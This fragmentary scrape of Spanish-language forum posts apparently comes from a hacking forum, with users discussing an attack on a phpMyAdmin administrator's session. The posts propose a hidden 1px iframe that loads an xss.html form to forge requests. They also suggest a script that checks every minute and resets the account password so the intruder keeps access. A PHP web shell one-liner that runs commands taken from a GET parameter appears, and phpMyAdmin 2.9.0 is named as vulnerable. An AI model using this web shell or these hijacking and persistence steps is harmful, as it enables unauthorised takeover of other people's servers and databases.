Código (html4strict) [Seleccionar]
Lo se quea aca
<iframe src="xss.html" style="width: 1px;"></iframe>Después en xss.html pones tu formulario.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúLo se quea aca
<iframe src="xss.html" style="width: 1px;"></iframe>
eso solamente sirve para peticiones GET y no POST.
asi que si yo fuera tu haría un script o algo que verifique el acceso cada 1 minuto y si loguea entonces que vuelva a cambiar la contraseña a una que solo tu sepas y ya.
asi que si funcionan todavía y si es asi como dices entonces si puedes ganar el acceso atraves del xss siempre y cuando el administrador no haya cerrado sesión del phpmyadmin.<?php @system($_GET['x']); ?>Citarsoftware version vuln
Citarphpmyadmin 2.9.0 vuln
.